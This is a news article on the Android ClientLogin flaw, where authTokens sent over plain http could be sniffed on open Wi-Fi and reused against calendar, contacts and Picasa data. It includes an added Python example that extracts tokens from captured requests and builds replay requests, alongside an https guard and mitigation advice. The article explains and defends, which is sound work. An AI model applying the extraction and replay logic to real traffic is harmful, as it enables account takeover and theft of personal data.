
Android User Data Easily Stolen

Researchers have discovered that most Android devices have holes through which personal data can be snagged by hackers.

The weak link in Android security, say University of Ulm researchers, is Google's ClientLogin authentication protocol when a device uses it on an open Wi-Fi network. ClientLogin is the mechanism the Android Market and Google's own apps use to authenticate a user's account details with Google services: the app sends the account credentials over a secured https connection and receives an authToken in return. The problem is what happens with that authToken, which can remain valid for up to two weeks. The apps then present it to Google's calendar, contacts, and Picasa services over plain http, so on an insecure network anyone can sniff the token out of the traffic and reuse it to access the user's personal data until it expires.

The personal data that's left hanging in the breeze is calendar information, contact data, and private Web albums. The researchers note that this means ne'er-do-wells can "view, modify, or delete any contacts, calendar events, or private pictures. This is not limited to items currently being synced but affects all items of that user."

Who does this affect? The researchers tested the authentication protocol across Android versions 2.1, 2.2, 2.2.1, 2.3.3, 2.3.4, and 3.0 on a wide range of handsets, including the HTC Nexus One, HTC Desire, HTC Incredible S, and the Motorola Xoom. Any device running Android 2.3.3 or older is more or less wide open, which, according to Google's most recent platform statistics, means 99.7% of all Android phones (very few devices have been updated to Android 2.3.x yet).

The 2.3.4 system update to Android adds https support for calendar and contacts authentication requests, but still leaves Picasa Web Albums requests open to attack.

The vulnerability in question applies not just to Google-developed Android applications, but to third-party applications as well. Essentially, any app that presents a ClientLogin authToken to Google's services over http rather than https is fair game.
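To make the failure mode concrete, here is an added example (not code from the article or from the Ulm researchers) that does what a passive observer on an open access point could do: scan captured HTTP requests for the `Authorization: GoogleLogin auth=...` header that ClientLogin-authenticated requests carry, and show that the recovered token is a plain bearer credential that can be dropped into a fresh request. The request texts, the token value, and the feed paths are constructed for illustration. The last function is the client-side guard an app author should apply: never attach the token to anything but an https URL.

```python
"""Spot ClientLogin authTokens sent in the clear, as a passive Wi-Fi observer would.

Added example, not code from the article or the Ulm researchers. The request
texts below are constructed; the token is a placeholder and the feed paths are
only meant to look like Google Data API requests of the period.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# ClientLogin-authenticated requests carry the token in this header, so it is
# trivially recoverable from any request that is not encrypted.
AUTH_RE = re.compile(r"^Authorization:\s*GoogleLogin\s+auth=(\S+)\s*$",
                     re.IGNORECASE | re.MULTILINE)
REQUEST_LINE_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/1\.[01]\s*$",
                             re.MULTILINE)
HOST_RE = re.compile(r"^Host:\s*(\S+)\s*$", re.IGNORECASE | re.MULTILINE)

TOKEN = "DQAAAK4AAACxxxxxxxxxxxxxEXAMPLE"  # constructed placeholder, not a real token

# (transport, raw request) pairs as seen from the open access point. A sniffer
# reads the plaintext of http requests only; the https ones are opaque to it.
SAMPLE_CAPTURES = [
    ("https", "POST /accounts/ClientLogin HTTP/1.1\r\nHost: www.google.com\r\n\r\n"
              "Email=user%40gmail.com&Passwd=example&service=cl"),
    ("http",  "GET /calendar/feeds/default/private/full HTTP/1.1\r\n"
              "Host: www.google.com\r\n"
              f"Authorization: GoogleLogin auth={TOKEN}\r\n\r\n"),
    ("http",  "GET /data/feed/api/user/default HTTP/1.1\r\n"
              "Host: picasaweb.google.com\r\n"
              f"Authorization: GoogleLogin auth={TOKEN}\r\n\r\n"),
    ("https", "GET /m8/feeds/contacts/default/full HTTP/1.1\r\n"
              "Host: www.google.com\r\n"
              f"Authorization: GoogleLogin auth={TOKEN}\r\n\r\n"),
]


@dataclass
class Exposure:
    host: str
    target: str
    token: str


def find_exposed_tokens(captures):
    """Return one Exposure per plaintext request that carries a ClientLogin token."""
    hits = []
    for transport, text in captures:
        if transport != "http":
            continue  # encrypted: an observer cannot read the headers
        auth = AUTH_RE.search(text)
        if not auth:
            continue
        req = REQUEST_LINE_RE.search(text)
        host = HOST_RE.search(text)
        hits.append(Exposure(
            host=host.group(1) if host else "?",
            target=req.group("target") if req else "?",
            token=auth.group(1),
        ))
    return hits


def replay_request(host, target, token):
    """Build a fresh request that reuses a captured token.

    Nothing binds the authToken to the device that obtained it, which is why a
    sniffed token is enough to read or change the account's data until it expires.
    """
    return (f"GET {target} HTTP/1.1\r\nHost: {host}\r\n"
            f"Authorization: GoogleLogin auth={token}\r\n\r\n")


def token_may_be_sent(url):
    """Client-side guard: only ever attach a ClientLogin token to an https URL.

    An app should apply this before every Google Data request; for calendar
    and contacts it is what the 2.3.4 update amounts to.
    """
    return urlsplit(url).scheme == "https"


if __name__ == "__main__":
    for hit in find_exposed_tokens(SAMPLE_CAPTURES):
        print(f"token {hit.token[:8]}... exposed on {hit.host}{hit.target}")
    print(token_may_be_sent("http://www.google.com/calendar/feeds/default/private/full"))
```

Run as a script it reports the two plaintext requests (calendar and Picasa) and ignores the two https ones, including the initial ClientLogin credential exchange, which is exactly the split the researchers describe: the login itself is protected, the long-lived token that comes back is not.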

Obviously, leaving this type of data unsecured could be problematic for anyone, but even more so for enterprise users of Android devices. Fortunately, there are some things that can be done to help prevent data theft.

First and foremost, don't use open Wi-Fi networks at all. Use cellular data and, if Wi-Fi is necessary, connect only to protected access points. End users also can switch off automatic syncing (while on Wi-Fi) in the settings menu. These are relatively easy changes that provide at least a modicum of protection until a more permanent fix is available, though a token that has already been sniffed stays usable until it expires.

As for a permanent fix, updating devices to Android 2.3.4 is necessary, but that won't be an easy step to take. Even minor system updates are generally available only through wireless network operators and handset vendors. Given how few devices run Android 2.3 at all, the probability that you'll be able to update your workforce to Android 2.3.4 in the near future is slim to none.

Beyond these steps, it is up to Google and Android developers to solve this security problem.
